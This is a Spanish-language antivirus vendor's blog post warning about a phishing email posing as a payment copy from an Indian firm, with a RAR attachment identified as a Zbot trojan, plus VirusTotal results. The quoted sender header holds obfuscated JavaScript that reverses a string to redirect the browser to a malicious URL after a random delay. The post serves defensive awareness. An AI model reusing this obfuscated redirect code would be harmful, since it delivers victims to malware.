NUEVO MAIL MALICIOSO QUE ESTA LLEGANDO A MUCHOS USUARIOS
Afortunadamente en inglés, lo cual alerta a la mayoria de nuestros clientes, se recibe este mail malicioso:
___________
Asunto: Re: Payment T/T Copy.
De: “Safavieh Import & Export Co.INDIA PVT. LTD.”<$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:You@%3Cdominio”>You@<dominio destinatario>
Dear Sir/Madam
Enclosed plz find the copy of TT against INV # 0307/2014
(Dated:12-01-2014).
Thanks
Gupta Kadam
Ramazan Ozturk Gupta.
Business Development & Purchasing Manager,
Safavieh Import & Export Co.INDIA PVT. LTD.
98,Niryat Bhawan,Station Road,Bhadohi-221401,
VKI Area, Jaipur-302013
Cell: +91 900180544
Tel: +91 141 233238, 233076
Fax: +91 141 233018
ANEXADO : tt payment copy.rar
_____________
El fichero anexado resulta ser un SPYZBOT.Y, el cual pasamos a controlarv a partir del ELISTARA 29.26 de hoy
El preanalisis de virustotal ofrece este informe:
SHA256: ffbbbbcb5e3b0de227a1f92da4408074b4bad466ca33f0369dc8da2eaa1f0a17
Nombre: 2002.exe
Detecciones: 13 / 50
Fecha de análisis: 2014-01-30 17:28:43 UTC ( hace 0 minutos )
0 1
Antivirus Resultado Actualización
AntiVir TR/Crypt.Xpack.54527 20140130
Baidu-International Trojan.Win32.Zbot.aL 20140130
Comodo UnclassifiedMalware 20140130
ESET-NOD32 a variant of Win32/Injector.AWOU 20140130
Emsisoft Trojan.GenericKD.1524037 (B) 20140130
Ikarus Trojan-Spy.Win32.Zbot 20140130
Kaspersky Trojan-Spy.Win32.Zbot.rjke 20140130
Kingsoft Win32.Troj.Undef.(kcloud) 20130829
Panda Suspicious file 20140130
Qihoo-360 HEUR/Malware.QVM07.Gen 20140126
Sophos Mal/Generic-S 20140130
Symantec Trojan.Zbot 20140130
TrendMicro-HouseCall TROJ_GEN.F0D1H00AT14 20140130
dICHA VERSION DEL elistara 29.26 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 30-11-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.